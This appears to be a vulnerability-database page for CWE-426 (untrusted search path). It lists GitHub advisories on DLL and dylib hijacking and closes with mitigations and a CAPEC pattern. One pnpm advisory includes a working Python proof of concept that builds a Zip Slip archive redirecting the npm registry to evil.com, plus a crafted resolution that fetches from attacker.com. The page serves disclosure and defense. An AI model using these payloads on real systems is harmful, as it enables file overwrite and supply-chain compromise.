CWE-426
Allowed-with-ReviewUntrusted Search Path
Abstraction: Base · Status: Stable
The product searches for critical resources using an externally-supplied search path that can point to resources that are not under the product's direct control.
892 vulnerabilities reference this CWE, most recent first.
GHSA-69H8-2GJF-XQ29
Vulnerability from github – Published: 2024-12-04 03:31 – Updated: 2024-12-04 03:31DLL injection in Veeam Agent for Windows can occur if the system's PATH variable includes insecure locations. When the agent runs, it searches these directories for necessary DLLs. If an attacker places a malicious DLL in one of these directories, the Veeam Agent might load it inadvertently, allowing the attacker to execute harmful code. This could lead to unauthorized access, data theft, or disruption of services
{
"affected": [],
"aliases": [
"CVE-2024-45207"
],
"database_specific": {
"cwe_ids": [
"CWE-426"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-04T02:15:05Z",
"severity": "HIGH"
},
"details": "DLL injection in Veeam Agent for Windows can occur if the system\u0027s PATH variable includes insecure locations. When the agent runs, it searches these directories for necessary DLLs. If an attacker places a malicious DLL in one of these directories, the Veeam Agent might load it inadvertently, allowing the attacker to execute harmful code. This could lead to unauthorized access, data theft, or disruption of services",
"id": "GHSA-69h8-2gjf-xq29",
"modified": "2024-12-04T03:31:16Z",
"published": "2024-12-04T03:31:16Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45207"
},
{
"type": "WEB",
"url": "https://www.veeam.com/kb4693"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-6CCG-R3F9-7J87
Vulnerability from github – Published: 2022-05-24 17:01 – Updated: 2022-05-24 17:01An issue was discovered in signmgr.dll 6.5.0.819 in Comodo Internet Security through 12.0. A DLL Preloading vulnerability allows an attacker to implant an unsigned DLL named iLog.dll in a partially unprotected product directory. This DLL is then loaded into a high-privileged service before the binary signature validation logic is loaded, and might bypass some of the self-defense mechanisms.
{
"affected": [],
"aliases": [
"CVE-2019-18215"
],
"database_specific": {
"cwe_ids": [
"CWE-426"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-11-18T20:15:00Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in signmgr.dll 6.5.0.819 in Comodo Internet Security through 12.0. A DLL Preloading vulnerability allows an attacker to implant an unsigned DLL named iLog.dll in a partially unprotected product directory. This DLL is then loaded into a high-privileged service before the binary signature validation logic is loaded, and might bypass some of the self-defense mechanisms.",
"id": "GHSA-6ccg-r3f9-7j87",
"modified": "2022-05-24T17:01:26Z",
"published": "2022-05-24T17:01:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-18215"
},
{
"type": "WEB",
"url": "https://forums.comodo.com/news-announcements-feedback-cis/comodo-internet-security-2019-v12106914-released-t124993.0.html"
},
{
"type": "WEB",
"url": "https://safebreach.com/Post/Comodo-Internet-Security-DLL-Preloading-and-Potential-Abuses-CVE-2019-18215"
},
{
"type": "WEB",
"url": "https://safebreach.com/blog"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-6FPQ-HQX5-5MQ2
Vulnerability from github – Published: 2026-06-09 18:30 – Updated: 2026-06-10 15:31Waves Central for macOS versions 13.0.9 through 16.5.5 contain a local privilege escalation vulnerability. A trusted XPC client component included with the product is signed with hardened runtime entitlements that permit dynamic library injection. A local attacker can set the DYLD_INSERT_LIBRARIES environment variable to inject an attacker-controlled dynamic library into the trusted client process at launch. The injected code runs within the signed process and can connect to the product's privileged helper service to invoke privileged operations, resulting in arbitrary code execution as root. The issue is fixed in version 16.6.2.
{
"affected": [],
"aliases": [
"CVE-2026-24064"
],
"database_specific": {
"cwe_ids": [
"CWE-426"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-09T16:16:39Z",
"severity": "HIGH"
},
"details": "Waves Central for macOS versions 13.0.9 through 16.5.5 contain a local privilege escalation vulnerability. A trusted XPC client component included with the product is signed with hardened runtime entitlements that permit dynamic library injection. A local attacker can set the DYLD_INSERT_LIBRARIES environment variable to inject an attacker-controlled dynamic library into the trusted client process at launch. The injected code runs within the signed process and can connect to the product\u0027s privileged helper service to invoke privileged operations, resulting in arbitrary code execution as root. The issue is fixed in version 16.6.2.",
"id": "GHSA-6fpq-hqx5-5mq2",
"modified": "2026-06-10T15:31:27Z",
"published": "2026-06-09T18:30:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24064"
},
{
"type": "WEB",
"url": "https://r.sec-consult.com/waves"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-6GG9-J293-HP7Q
Vulnerability from github – Published: 2022-05-24 22:00 – Updated: 2022-05-24 22:00Adobe Dreamweaver direct download installer versions 19.0 and below, 18.0 and below have an Insecure Library Loading (DLL hijacking) vulnerability. Successful exploitation could lead to Privilege Escalation in the context of the current user.
{
"affected": [],
"aliases": [
"CVE-2019-7956"
],
"database_specific": {
"cwe_ids": [
"CWE-426"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-07-18T22:15:00Z",
"severity": "HIGH"
},
"details": "Adobe Dreamweaver direct download installer versions 19.0 and below, 18.0 and below have an Insecure Library Loading (DLL hijacking) vulnerability. Successful exploitation could lead to Privilege Escalation in the context of the current user.",
"id": "GHSA-6gg9-j293-hp7q",
"modified": "2022-05-24T22:00:15Z",
"published": "2022-05-24T22:00:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7956"
},
{
"type": "WEB",
"url": "https://helpx.adobe.com/security/products/dreamweaver/apsb19-40.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-6H87-2757-3P27
Vulnerability from github – Published: 2022-05-14 03:38 – Updated: 2022-05-14 03:38Untrusted search path vulnerability in FLET'S v4 / v6 address selection tool allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory.
{
"affected": [],
"aliases": [
"CVE-2018-0516"
],
"database_specific": {
"cwe_ids": [
"CWE-426"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-02-16T17:29:00Z",
"severity": "HIGH"
},
"details": "Untrusted search path vulnerability in FLET\u0027S v4 / v6 address selection tool allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory.",
"id": "GHSA-6h87-2757-3p27",
"modified": "2022-05-14T03:38:25Z",
"published": "2022-05-14T03:38:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-0516"
},
{
"type": "WEB",
"url": "https://jvn.jp/en/jp/JVN87403477/index.html"
},
{
"type": "WEB",
"url": "http://flets-w.com/topics/2018/20180207a.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-6MH4-V7FH-GJ6X
Vulnerability from github – Published: 2022-05-17 02:43 – Updated: 2022-05-17 02:43Untrusted search path vulnerability in 7 Zip for Windows 16.02 and earlier allows remote attackers to gain privileges via a Trojan horse DLL in an unspecified directory.
{
"affected": [],
"aliases": [
"CVE-2016-7804"
],
"database_specific": {
"cwe_ids": [
"CWE-426"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-05-22T16:29:00Z",
"severity": "HIGH"
},
"details": "Untrusted search path vulnerability in 7 Zip for Windows 16.02 and earlier allows remote attackers to gain privileges via a Trojan horse DLL in an unspecified directory.",
"id": "GHSA-6mh4-v7fh-gj6x",
"modified": "2022-05-17T02:43:12Z",
"published": "2022-05-17T02:43:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-7804"
},
{
"type": "WEB",
"url": "https://jvn.jp/en/jp/JVN76780067/index.html"
},
{
"type": "WEB",
"url": "http://jvndb.jvn.jp/jvndb/JVNDB-2016-000211"
},
{
"type": "WEB",
"url": "http://www.7-zip.org/history.txt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-6PFH-P556-V868
Vulnerability from github – Published: 2026-01-26 21:02 – Updated: 2026-01-28 16:18Summary
A path traversal vulnerability in pnpm's binary fetcher allows malicious packages to write files outside the intended extraction directory. The vulnerability has two attack vectors: (1) Malicious ZIP entries containing ../ or absolute paths that escape the extraction root via AdmZip's extractAllTo, and (2) The BinaryResolution.prefix field is concatenated into the extraction path without validation, allowing a crafted prefix like ../../evil to redirect extracted files outside targetDir.
Details
The vulnerability exists in the binary fetching and extraction logic:
1. Unvalidated ZIP Entry Extraction (fetching/binary-fetcher/src/index.ts)
AdmZip's extractAllTo does not validate entry paths for path traversal:
const zip = new AdmZip(buffer)
const nodeDir = basename === '' ? targetDir : path.dirname(targetDir)
const extractedDir = path.join(nodeDir, basename)
zip.extractAllTo(nodeDir, true) // Entry paths not validated!
await renameOverwrite(extractedDir, targetDir)
A ZIP entry with path ../../../.npmrc will be written outside nodeDir.
2. Unvalidated Prefix in BinaryResolution (resolving/resolver-base/src/index.ts)
The basename variable comes from BinaryResolution.prefix and is used directly in path construction:
const extractedDir = path.join(nodeDir, basename)
// If basename is '../../evil', this points outside nodeDir
PoC
Attack Vector 1: ZIP Entry Path Traversal
import zipfile
import io
zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, 'w') as zf:
# Normal file
zf.writestr('node-v20.0.0-linux-x64/bin/node', b'#!/bin/sh\necho "legit node"')
# Malicious path traversal entry
zf.writestr('../../../.npmrc', b'registry=https://evil.com/\n')
with open('malicious-node.zip', 'wb') as f:
f.write(zip_buffer.getvalue())
Attack Vector 2: Prefix Traversal via malicious resolution:
{
"resolution": {
"type": "binary",
"url": "https://attacker.com/node.zip",
"prefix": "../../PWNED"
}
}
Impact
- All pnpm users who install packages with binary assets
- Users who configure custom Node.js binary locations
- CI/CD pipelines that auto-install binary dependencies
- Can overwrite config files, scripts, or other sensitive files leading to RCE
Verified on pnpm main @ commit 5a0ed1d45.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "pnpm"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "10.28.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-23888"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-23",
"CWE-426"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-26T21:02:49Z",
"nvd_published_at": "2026-01-26T22:15:56Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nA path traversal vulnerability in pnpm\u0027s binary fetcher allows malicious packages to write files outside the intended extraction directory. The vulnerability has two attack vectors: (1) Malicious ZIP entries containing `../` or absolute paths that escape the extraction root via AdmZip\u0027s `extractAllTo`, and (2) The `BinaryResolution.prefix` field is concatenated into the extraction path without validation, allowing a crafted prefix like `../../evil` to redirect extracted files outside `targetDir`.\n\n### Details\n\nThe vulnerability exists in the binary fetching and extraction logic:\n\n**1. Unvalidated ZIP Entry Extraction (`fetching/binary-fetcher/src/index.ts`)**\n\nAdmZip\u0027s `extractAllTo` does not validate entry paths for path traversal:\n\n```typescript\nconst zip = new AdmZip(buffer)\nconst nodeDir = basename === \u0027\u0027 ? targetDir : path.dirname(targetDir)\nconst extractedDir = path.join(nodeDir, basename)\nzip.extractAllTo(nodeDir, true) // Entry paths not validated!\nawait renameOverwrite(extractedDir, targetDir)\n```\n\nA ZIP entry with path `../../../.npmrc` will be written outside `nodeDir`.\n\n**2. Unvalidated Prefix in BinaryResolution (`resolving/resolver-base/src/index.ts`)**\n\nThe `basename` variable comes from `BinaryResolution.prefix` and is used directly in path construction:\n\n```typescript\nconst extractedDir = path.join(nodeDir, basename)\n// If basename is \u0027../../evil\u0027, this points outside nodeDir\n```\n\n### PoC\n\n**Attack Vector 1: ZIP Entry Path Traversal**\n\n```python\nimport zipfile\nimport io\n\nzip_buffer = io.BytesIO()\nwith zipfile.ZipFile(zip_buffer, \u0027w\u0027) as zf:\n # Normal file\n zf.writestr(\u0027node-v20.0.0-linux-x64/bin/node\u0027, b\u0027#!/bin/sh\\necho \"legit node\"\u0027)\n # Malicious path traversal entry\n zf.writestr(\u0027../../../.npmrc\u0027, b\u0027registry=https://evil.com/\\n\u0027)\n\nwith open(\u0027malicious-node.zip\u0027, \u0027wb\u0027) as f:\n f.write(zip_buffer.getvalue())\n```\n\n**Attack Vector 2: Prefix Traversal via malicious resolution:**\n\n```json\n{\n \"resolution\": {\n \"type\": \"binary\",\n \"url\": \"https://attacker.com/node.zip\",\n \"prefix\": \"../../PWNED\"\n }\n}\n```\n\n### Impact\n\n- All pnpm users who install packages with binary assets\n- Users who configure custom Node.js binary locations\n- CI/CD pipelines that auto-install binary dependencies\n- Can overwrite config files, scripts, or other sensitive files leading to RCE\n\nVerified on pnpm main @ commit `5a0ed1d45`.",
"id": "GHSA-6pfh-p556-v868",
"modified": "2026-01-28T16:18:11Z",
"published": "2026-01-26T21:02:49Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-6pfh-p556-v868"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23888"
},
{
"type": "WEB",
"url": "https://github.com/pnpm/pnpm/commit/5c382f0ca3b7cc49963b94677426e66539dcb3f5"
},
{
"type": "PACKAGE",
"url": "https://github.com/pnpm/pnpm"
},
{
"type": "WEB",
"url": "https://github.com/pnpm/pnpm/releases/tag/v10.28.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "pnpm: Binary ZIP extraction allows arbitrary file write via path traversal (Zip Slip)"
}
GHSA-6PVH-5MC9-HM57
Vulnerability from github – Published: 2026-07-13 03:31 – Updated: 2026-07-13 03:31A security vulnerability has been detected in Tencent PC Manager 18.1.30242.301. This issue affects some unknown processing in the library qmudisk64.sys of the component QMUDisk Driver. The manipulation leads to uncontrolled search path. The attack must be carried out locally. The attack is considered to have high complexity. The exploitability is assessed as difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2026-15515"
],
"database_specific": {
"cwe_ids": [
"CWE-426"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-13T01:17:04Z",
"severity": "MODERATE"
},
"details": "A security vulnerability has been detected in Tencent PC Manager 18.1.30242.301. This issue affects some unknown processing in the library qmudisk64.sys of the component QMUDisk Driver. The manipulation leads to uncontrolled search path. The attack must be carried out locally. The attack is considered to have high complexity. The exploitability is assessed as difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-6pvh-5mc9-hm57",
"modified": "2026-07-13T03:31:47Z",
"published": "2026-07-13T03:31:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15515"
},
{
"type": "WEB",
"url": "https://github.com/subsubsub1231/qmukiller"
},
{
"type": "WEB",
"url": "https://vuldb.com/cve/CVE-2026-15515"
},
{
"type": "WEB",
"url": "https://vuldb.com/submit/848643"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/377844"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/377844/cti"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-6Q3Q-6X5M-34Q7
Vulnerability from github – Published: 2025-03-01 21:30 – Updated: 2025-03-01 21:30A vulnerability was found in Blizzard Battle.Net up to 2.39.0.15212 on Windows and classified as critical. Affected by this issue is some unknown functionality in the library profapi.dll. The manipulation leads to uncontrolled search path. The attack needs to be approached locally. The complexity of an attack is rather high. The exploitation is known to be difficult.
{
"affected": [],
"aliases": [
"CVE-2025-1804"
],
"database_specific": {
"cwe_ids": [
"CWE-426"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-01T19:15:10Z",
"severity": "HIGH"
},
"details": "A vulnerability was found in Blizzard Battle.Net up to 2.39.0.15212 on Windows and classified as critical. Affected by this issue is some unknown functionality in the library profapi.dll. The manipulation leads to uncontrolled search path. The attack needs to be approached locally. The complexity of an attack is rather high. The exploitation is known to be difficult.",
"id": "GHSA-6q3q-6x5m-34q7",
"modified": "2025-03-01T21:30:40Z",
"published": "2025-03-01T21:30:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1804"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.298040"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.298040"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.485034"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-6QQ2-69C3-WR79
Vulnerability from github – Published: 2022-05-17 02:40 – Updated: 2022-05-17 02:40Untrusted search path vulnerability in The Public Certification Service for Individuals "The JPKI user's software (for Windows 7 and later)" Ver3.0.1 and earlier, The Public Certification Service for Individuals "The JPKI user's software (for Windows Vista)" Ver3.0.1 and earlier and The Public Certification Service for Individuals "The JPKI user's software" Ver2.6 and earlier allows remote attackers to gain privileges via a Trojan horse DLL in an unspecified directory.
{
"affected": [],
"aliases": [
"CVE-2016-4902"
],
"database_specific": {
"cwe_ids": [
"CWE-426"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-06-09T16:29:00Z",
"severity": "HIGH"
},
"details": "Untrusted search path vulnerability in The Public Certification Service for Individuals \"The JPKI user\u0027s software (for Windows 7 and later)\" Ver3.0.1 and earlier, The Public Certification Service for Individuals \"The JPKI user\u0027s software (for Windows Vista)\" Ver3.0.1 and earlier and The Public Certification Service for Individuals \"The JPKI user\u0027s software\" Ver2.6 and earlier allows remote attackers to gain privileges via a Trojan horse DLL in an unspecified directory.",
"id": "GHSA-6qq2-69c3-wr79",
"modified": "2022-05-17T02:40:32Z",
"published": "2022-05-17T02:40:32Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-4902"
},
{
"type": "WEB",
"url": "https://jvn.jp/en/jp/JVN91002412/index.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/94087"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation
Strategy: Attack Surface Reduction
Hard-code the search path to a set of known-safe values (such as system directories), or only allow them to be specified by the administrator in a configuration file. Do not allow these settings to be modified by an external party. Be careful to avoid related weaknesses such as CWE-426 and CWE-428.
Mitigation
When invoking other programs, specify those programs using fully-qualified pathnames. While this is an effective approach, code that uses fully-qualified pathnames might not be portable to other systems that do not use the same pathnames. The portability can be improved by locating the full-qualified paths in a centralized, easily-modifiable location within the source code, and having the code refer to these paths.
Mitigation
Remove or restrict all environment settings before invoking other programs. This includes the PATH environment variable, LD_LIBRARY_PATH, and other settings that identify the location of code libraries, and any application-specific search paths.
Mitigation
Check your search path before use and remove any elements that are likely to be unsafe, such as the current working directory or a temporary files directory.
Mitigation
Use other functions that require explicit paths. Making use of any of the other readily available functions that require explicit paths is a safe way to avoid this problem. For example, system() in C does not require a full path since the shell can take care of it, while execl() and execv() require a full path.
CAPEC-38: Leveraging/Manipulating Configuration File Search Paths
This pattern of attack sees an adversary load a malicious resource into a program's standard path so that when a known command is executed then the system instead executes the malicious component. The adversary can either modify the search path a program uses, like a PATH variable or classpath, or they can manipulate resources on the path to point to their malicious components. J2EE applications and other component based applications that are built from multiple binaries can have very long list of dependencies to execute. If one of these libraries and/or references is controllable by the attacker then application controls can be circumvented by the attacker.